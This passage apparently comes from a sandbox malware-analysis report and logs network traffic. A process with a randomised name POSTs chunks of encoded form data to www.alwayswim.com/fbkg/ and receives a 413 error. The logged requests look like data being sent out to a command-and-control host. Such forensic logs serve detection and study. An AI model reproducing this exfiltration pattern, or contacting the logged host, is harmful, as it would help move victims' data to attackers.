                                                                                                                                                                                                Data Ascii: zjsK9kMFyxCpJJYhCJpUz3HKmsfHgPRNTGb/2Y6TjWnxAywU/ISaWimMTdSbz8d/by84S6K1tUp0j84SPxrRUZLICVYk4RjDDVvY2PHEUi+UEOxFpk4wGLj7ctw+7HpB2x1nvnoj78PZZUI6IY3+YYGKjccDvumDn2V4JHGS7VEzub2ERC2evDemLEjCu9uDEISDGQDBfbxKMgCcY3qp2caeneR8KKuX2ZoLbarxCsMO7+URPWP
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483453989 CET1019OUTData Raw: 69 43 37 43 52 4e 6c 48 65 46 37 4e 58 48 55 44 5a 4a 51 6e 57 41 35 34 4e 68 41 41 4c 41 4b 4d 68 5a 73 55 6f 69 6e 46 4f 4a 2b 34 6a 4b 38 39 71 72 32 4f 38 51 6f 61 67 64 6b 2f 7a 4d 59 7a 77 51 58 54 44 36 4e 56 77 35 41 57 31 76 4e 32 4e 6d
                                                                                                                                                                                                Data Ascii: iC7CRNlHeF7NXHUDZJQnWA54NhAALAKMhZsUoinFOJ+4jK89qr2O8Qoagdk/zMYzwQXTD6NVw5AW1vN2NmoHXfdIeUc7Sr4tguN6HYWqMUAJdddRKjr6Vzu53c4kRxVf2JMKB90slNLA6nMBVXckUtjYjdVhsbpo05I52Hi2FhWogt4I7W+ErXB2Fz1oaGBdKkspYIab3UEidnVPiQ2wCucNdJSYAf5HsqYxV6HHIeqd2HkKo1v
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483627081 CET1024OUTData Raw: 58 34 6e 77 4d 4b 4e 6d 4e 73 69 5a 6d 61 45 69 65 62 77 66 45 56 41 44 4e 7a 38 70 52 49 51 48 70 4d 37 76 4a 48 55 32 71 39 41 72 70 66 62 6b 63 54 52 78 65 43 47 44 55 6d 68 6b 49 33 39 4f 7a 43 62 76 48 6c 5a 48 71 6b 62 78 68 54 63 6c 6c 79
                                                                                                                                                                                                Data Ascii: X4nwMKNmNsiZmaEiebwfEVADNz8pRIQHpM7vJHU2q9ArpfbkcTRxeCGDUmhkI39OzCbvHlZHqkbxhTcllyI7UuoiEaS5kVjdO2cyHiZg0cmr1EFhzN7uYATMsGkTW2sxJRNIHjC7ky9k91Vgf0epayNXeYN7f348Xn8ngLVXHF3S1v1+OWRkz32q/5uvpv3kmCV3MWeYOskwh2slai6UY6oawbEGIu+4VG4F1wWouaYm4g9VqK8
                                                                                                                                                                                                Nov 17, 2023 19:30:32.524153948 CET1027OUTData Raw: 74 66 6e 36 52 62 55 2f 79 35 36 79 44 35 33 78 6a 62 32 33 6d 61 4e 42 32 61 49 78 55 43 4f 6c 79 61 4b 53 4d 69 4d 46 77 4e 31 6b 63 45 67 69 57 2f 31 59 44 46 4b 6d 36 56 4b 54 48 34 6b 53 4b 64 39 45 6b 78 30 32 49 76 52 48 4d 56 64 75 59 79
                                                                                                                                                                                                Data Ascii: tfn6RbU/y56yD53xjb23maNB2aIxUCOlyaKSMiMFwN1kcEgiW/1YDFKm6VKTH4kSKd9Ekx02IvRHMVduYyI1nIGhBiQVj732wmEJl3N9CI61hTKWRC85SqS7aOnN2Qd9DaCDUlNdGt6CeZduQy+DCPzUEp9tww8Zgr/feNUferVIkWSiU21fOCIpL77fSiLpv20JfpJ/Oh40/U4NFbdM4CrGgmlQxqHyHAoDVi6v5dEw7zQrWQj
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624094963 CET1029OUTData Raw: 30 64 7a 43 52 64 2b 44 37 78 50 39 68 35 6e 6b 78 6a 4c 4c 70 57 6a 61 6d 4a 5a 56 56 43 64 33 50 54 30 58 53 72 51 47 62 4f 70 32 56 6d 45 66 67 51 39 72 51 71 4d 68 57 6f 6d 38 4b 43 64 76 57 6a 59 32 48 72 4a 51 73 57 63 47 79 4c 66 77 36 6c
                                                                                                                                                                                                Data Ascii: 0dzCRd+D7xP9h5nkxjLLpWjamJZVVCd3PT0XSrQGbOp2VmEfgQ9rQqMhWom8KCdvWjY2HrJQsWcGyLfw6lVr4lRL5+8eNa/Gu4k1T5fxG5CjPyKabGTxbXlchZFEQHe4vgTseJELnx0tDEMLajTIG3pteZC9fFR30W0INy8gZBGHvxCbmERwzxoWd2e3IQdWbvNdbhTCYNhiGD+ZQHGWkqWo/L9yi3y0N1VH9D9vyV/x0vXMq8s
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624237061 CET1033OUTData Raw: 31 78 49 76 65 43 67 36 48 76 44 2f 36 46 33 79 2f 6f 77 71 57 2f 36 59 41 6a 68 55 73 78 64 59 65 6f 58 58 51 46 77 75 73 6b 6f 2b 72 42 43 59 4e 36 45 5a 33 73 68 70 46 2b 6a 32 67 52 70 39 4d 44 45 52 7a 47 2b 30 79 4b 6f 4b 6e 6e 38 57 71 44
                                                                                                                                                                                                Data Ascii: 1xIveCg6HvD/6F3y/owqW/6YAjhUsxdYeoXXQFwusko+rBCYN6EZ3shpF+j2gRp9MDERzG+0yKoKnn8WqDBGi+lcwdO0+X10DssxkfjdVZhMpEMYWJw6+J62C7rmBHayVjIesMu+VjE8HURITTYUDxtE2nNCVMIh0/Z8cW6SNq4J6HFV9fUB/3AF0TxA3NCPO3dpAuZ76kgAWh/U/IFVMpCyevgAPyFx6AL1i0+ItY8mqljBMn+


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4545.33.23.18380192.168.11.2050172C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:32.341881037 CET996OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.alwayswim.com
                                                                                                                                                                                                Referer: http://www.alwayswim.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 41 4e 6f 72 4a 30 66 68 73 46 71 64 6f 33 6a 39 38 4a 63 43 6f 2f 42 69 58 61 65 53 39 48 7a 47 6d 64 42 51 56 65 74 5a 4d 39 54 72 79 7a 73 63 44 4a 50 44 68 76 76 37 75 4b 31 79 36 61 79 4e 68 45 56 37 30 61 4a 65 58 31 4c 65 76 67 6b 5a 43 45 69 2f 43 77 57 62 62 4e 43 4e 41 36 71 42 71 39 73 64 51 43 71 48 62 68 77 2f 57 6f 4e 77 4d 54 2b 46 57 59 59 51 67 6c 76 2f 2b 69 39 4f 39 46 62 44 63 52 64 61 41 33 59 35 65 2b 37 73 4b 6d 35 4b 62 73 48 72 43 6c 45 64 59 65 46 33 53 50 48 41 36 59 54 51 38 51 56 43 53 6a 36 61 5a 57 43 4b 38 53 38 75 2b 64 44 6f 69 50 70 79 74 69 36 50 6a 71 63 79 31 33 49 41 36 61 75 46 79 6b 6e 53 4e 6b 7a 71 69 64 66 77 5a 75 64 48 58 47 31 33 43 4d 35 4d 57 32 7a 48 58 45 74 55 65 66 54 68 4c 70 6d 49 73 41 6d 68 35 33 36 54 58 65 62 47 33 71 44 30 34 35 50 67 36 56 35 53 2b 2f 36 61 6f 58 4a 57 78 75 59 44 38 76 45 41 41 32 4e 4c 41 32 31 6f 4d 48 50 67 79 36 69 4e 30 33 76 2b 57 46 32 6b 43 2b 35 61 75 79 79 66 53 63 4d 54 57 65 75 74 34 43 54 4d 67 30 4b 4b 55 4b 42 71 51 4b 57 35 36 69 41 78 4d 54 4a 4a 4c 63 66 56 47 75 77 33 38 2f 49 77 4c 64 52 58 69 77 51 74 53 74 74 4e 57 63 31 53 70 36 46 63 51 4c 75 42 46 47 79 4f 70 36 31 78 33 56 33 6a 53 48 4c 50 6d 57 61 54 51 4e 68 77 73 5a 38 4d 47 63 31 33 74 34 4e 6e 6b 38 72 52 55 63 45 68 51 44 64 78 39 48 74 4b 62 59 71 71 36 33 63 73 67 45 51 73 6f 49 56 65 77 57 37 61 51 52 74 53 5a 52 69 59 41 4e 32 58 56 48 6b 56 53 37 76 6b 51 4b 31 4c 48 66 65 62 75 33 39 49 4b 43 43 52 32 62 30 4d 30 75 35 35 35 79 45 42 6f 4c 74 61 47 74 6b 4a 75 6d 55 42 75 70 39 6d 30 6e 43 7a 75 37 51 32 55 6b 6b 66 58 7a 4b 67 79 39 70 78 6c 6f 39 4b 33 71 33 49 69 42 57 41 71 30 51 4b 31 46 4b 51 65 74 59 63 65 74 42 65 36 46 57 39 49 33 72 32 2b 53 76 4b 50 51 32 6b 50 54 74 2f 59 67 53 48 48 71 62 39 63 44 47 72 63 51 6f 4c 68 76 4a 63 78 4e 68 48 61 77 55 42 4b 52 67 66 72 72 79 42 48 54 48 4b 62 67 4e 49 4a 34 63 4b 5a 31 4d 58 39 34 37 67 57 2b 72 31 61 5a 36 6b 65 61 41 55 67 62 65 4b 74 52 6f 68 59 6a 4e 32 67 6c 54 31 52 2f 41 74 45 36 65 31 63 66 4b 78 39 74 6e 53 54 5a 59 4a 4e 6b 79 65 78 75 6c 53 64 70 52 4b 56 55 37 38 69 73 61 6d 6b 33 66 7a 53 45 54 6d 55 38 4d 63 33 35 64 63 77 32 74 39 32 4a 31 73 69 4f 33 76 32 59 6d 61 4d 35 6c 55 55 70 68 36 35 4d 2f 65 71 45 6a 50 2f 55 68 4a 66 31 4b 68 55 46 4c 76 78 43 4e 55 4b 39 44 66 65 6e 50 39 57 41 49 70 48 2f 39 43 79 42 75 47 46 39 6f 77 6c 49 7a 41 70 35 43 6f 4c 4a 76 45 6e 68 6e 61 54 73 7a 2f 76 4d 73 66 75 34 36 46 2f 37 48 6d 35 6d 34 41 78 6d 36 38 41 54 2f 77 74 6f 4f 68 68 4c 6b 53 38 7a 56 6c 63 31 6b 47 4c 46 54 30 59 31 6a 62 77 37 32 34 50 49 48 70 43 2b 5a 37 4f 47 76 54 6f 4b 4e 59 69 30 48 69 2b 79 46 63 79 45 51 77 34 33 64 34 37 64 63 31 64 73 34 51 2f 53 6a 4a 58 6c 78 68 5a 33 74 6f 66 45 66 4f 4f 53 32 50 73 31 78 4a 36 72 53 79 56 36 36 2f 57 58 39 66 41 67 61 44 2f 59 7a 55 7a 47 59 32 32 68 6a 33 57 2f 72 4a 44 6b 6d 56 73 62 67 78 36 56 43 31 39 76 6f 53 4c 55 62 37 30 62 73 2f 51 70 47 70 49 7a 77 65 36 33 6a 42 4c 61 79 61 53 70 4c 56 5a 5a 61 36 6c 74 4e 35 4b 38 4c 69 50 33 38 74 63 4b 59 76 75 42 4d 4d 6e 5a 2b 7a 41 65 4e 35 6a 4d 42 70 52 33 75 66 68 36 4a 39 4e 79 51 5a 4d 61 78 42 79 74 31 59 72 69 52 76 39 42 72 55 6b 66 74 71 77 6a 54 6d 34 4a 72 55 4a 48 4f 54 50 43 6e 36 68 66 77 34 4c 6c 57 71 42 71 70 5a 6d 6c 57 75 47 71 4e 51 42 33 58 46 51 7a 57 49 45 6e 56 37 61 45 76 67 77 78 72 45 62 58 43 54 4e 77 52 31 59 48 4e 5a 33 52 52 72 56 58 35 4b 63 4f 6c 55 75 7a 4f 6d 41 73 62 4c 72 6e 76 73 6e 39 31 6c 31 58 42 42 37 78 72 51 4c 64 6d 32 33 46 67 6f 34 46 43 41 4a 78 47 78 55 73 42 76 4c 2f 68 6f 6a 4f 4c 6b 49 68 35 35 37 49 45 66 59 65 55 4b 4a 46 59 66 72 6d 65 55 42 55 4f 36 63 34 32 68 2b 70 61 47 6c 6f 5a 52 53 6b 30 51 6e 68 35 32 63 42 65 63 77 4d 78 30 48 33 6a 57 5a 2b 4a 33 77 61 2f 66 67 53 72 4d 31 50 47 77 4e 44 47 7a 4b 48 6d 34 77 73 74 7a 74 2b 47 59 76 4a 76 6e 75 34 61 42 34 31 65 31 54 6a 4a 65 39 58 4a 4a 68 48 67 4a 41 77 36 37 6e 69 75 50 63 62 36 48 32 4f 4a 57 5a 50 32 73 39 69 39 46 73 55 38 36 4c 44 4e
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:32.341968060 CET1000OUTData Raw: 31 74 32 46 36 48 79 65 31 75 50 6d 35 54 6e 64 44 32 76 2f 2b 2b 4c 73 49 41 4a 7a 48 76 50 63 50 33 2b 35 4c 45 43 4f 50 30 58 4f 74 79 69 6a 4a 71 43 46 6e 61 6a 33 53 6e 53 32 6d 4c 4f 59 41 6f 64 71 46 59 6b 62 6c 67 41 36 5a 36 78 73 70 6b
                                                                                                                                                                                                Data Ascii: 1t2F6Hye1uPm5TndD2v/++LsIAJzHvPcP3+5LECOP0XOtyijJqCFnaj3SnS2mLOYAodqFYkblgA6Z6xspkspXT6vmK4puXF0qRnAS75dN9XNgPQ+H+v5BmBJKRUT3chV3g5SfUivUxguoq9eU5LreRPa4HLM9qewkFbY6+kP0lxTQhf5ROpW25FCIgEQnBZhQQBJxZP+x63CcBhQtiaryZZviuR0QP3m5GvHr11oikLXJbWvPyH
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482650995 CET1003OUTData Raw: 52 73 37 75 46 38 7a 6d 6c 41 78 41 65 68 72 53 33 62 69 35 49 58 34 4f 44 54 43 4b 4c 62 65 56 65 42 57 55 4c 38 7a 41 43 64 58 7a 76 38 41 42 2b 4c 31 42 51 55 33 61 47 75 6e 59 6b 4a 43 35 46 47 42 57 76 41 4a 34 31 78 6d 58 44 36 58 56 52 6b
                                                                                                                                                                                                Data Ascii: Rs7uF8zmlAxAehrS3bi5IX4ODTCKLbeVeBWUL8zACdXzv8AB+L1BQU3aGunYkJC5FGBWvAJ41xmXD6XVRkhoh3EqlcAHlmBUbrLvYFGHUzRVPNmMfqBjKD4fyht4IvVHBS+bhTqLE+unu1CY14ek2x92kTpLkGJjVBAIyC/BWkE36omgYF5qj86slvO43ytFNTqF2YOgS3mXoi3LqCWEE1VtTBcmH7g3jpX8X7OagZcDC1QmpJm
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482783079 CET1010OUTData Raw: 6e 50 4b 76 69 74 48 66 30 51 30 4c 4c 36 72 6b 77 4b 4f 61 33 42 68 68 70 63 34 36 75 78 61 49 4f 70 51 42 2f 47 72 78 4e 38 41 6c 44 45 2f 77 7a 48 33 41 38 45 51 49 45 76 77 39 62 4a 6f 52 65 76 55 72 48 43 46 6e 2f 61 32 4d 63 6e 64 31 47 72
                                                                                                                                                                                                Data Ascii: nPKvitHf0Q0LL6rkwKOa3Bhhpc46uxaIOpQB/GrxN8AlDE/wzH3A8EQIEvw9bJoRevUrHCFn/a2Mcnd1GrISBhJECv/NP2nLNrZ/cBqbM2irZ2mOWOG9fF0IpF0GOIZkokCvKHeeZHNZr9gzRs4hUbpWQ+z8dqf/+gqVp/jfJbJyDcFUF1cjhwARYIZjSxazGcgdT1osUmyDLNhhFXkRnH82w5HnvW1IMm0Fh9ZWkJu4k3HP7tg
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482944965 CET1013OUTData Raw: 6b 6e 4a 79 56 39 64 46 31 57 41 69 6b 72 75 77 47 57 30 5a 52 34 38 36 6f 55 6f 77 77 78 4e 4c 30 6a 49 54 4e 6f 64 52 49 44 30 33 34 32 4b 62 66 56 2b 4a 41 47 68 4f 50 6d 69 45 62 78 35 30 71 71 31 35 4f 38 2f 6f 2f 47 50 63 55 55 74 66 69 42
                                                                                                                                                                                                Data Ascii: knJyV9dF1WAikruwGW0ZR486oUowwxNL0jITNodRID0342KbfV+JAGhOPmiEbx50qq15O8/o/GPcUUtfiBw1HaEkqijD5PUl2faCSTykH6jU+Wr7ahEMTxXzb4s6BzUoQQD/HhfM5nPdyK61JIGiQfnntJkQ5EY/9TVdY6UpPYuUMsEsnROK6FOnkQDDVfJrT7UP99JDbxpEAiPeKb2PbJWRBfK89hNjqhbuaVwLoSVKNgt1wKj
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483093977 CET1014INHTTP/1.1 413 Request Entity Too Large
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:32 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 607
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483124018 CET1016OUTData Raw: 7a 6a 73 4b 39 6b 4d 46 79 78 43 70 4a 4a 59 68 43 4a 70 55 7a 33 48 4b 6d 73 66 48 67 50 52 4e 54 47 62 2f 32 59 36 54 6a 57 6e 78 41 79 77 55 2f 49 53 61 57 69 6d 4d 54 64 53 62 7a 38 64 2f 62 79 38 34 53 36 4b 31 74 55 70 30 6a 38 34 53 50 78
                                                                                                                                                                                                Data Ascii: zjsK9kMFyxCpJJYhCJpUz3HKmsfHgPRNTGb/2Y6TjWnxAywU/ISaWimMTdSbz8d/by84S6K1tUp0j84SPxrRUZLICVYk4RjDDVvY2PHEUi+UEOxFpk4wGLj7ctw+7HpB2x1nvnoj78PZZUI6IY3+YYGKjccDvumDn2V4JHGS7VEzub2ERC2evDemLEjCu9uDEISDGQDBfbxKMgCcY3qp2caeneR8KKuX2ZoLbarxCsMO7+URPWP
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483453989 CET1019OUTData Raw: 69 43 37 43 52 4e 6c 48 65 46 37 4e 58 48 55 44 5a 4a 51 6e 57 41 35 34 4e 68 41 41 4c 41 4b 4d 68 5a 73 55 6f 69 6e 46 4f 4a 2b 34 6a 4b 38 39 71 72 32 4f 38 51 6f 61 67 64 6b 2f 7a 4d 59 7a 77 51 58 54 44 36 4e 56 77 35 41 57 31 76 4e 32 4e 6d
                                                                                                                                                                                                Data Ascii: iC7CRNlHeF7NXHUDZJQnWA54NhAALAKMhZsUoinFOJ+4jK89qr2O8Qoagdk/zMYzwQXTD6NVw5AW1vN2NmoHXfdIeUc7Sr4tguN6HYWqMUAJdddRKjr6Vzu53c4kRxVf2JMKB90slNLA6nMBVXckUtjYjdVhsbpo05I52Hi2FhWogt4I7W+ErXB2Fz1oaGBdKkspYIab3UEidnVPiQ2wCucNdJSYAf5HsqYxV6HHIeqd2HkKo1v
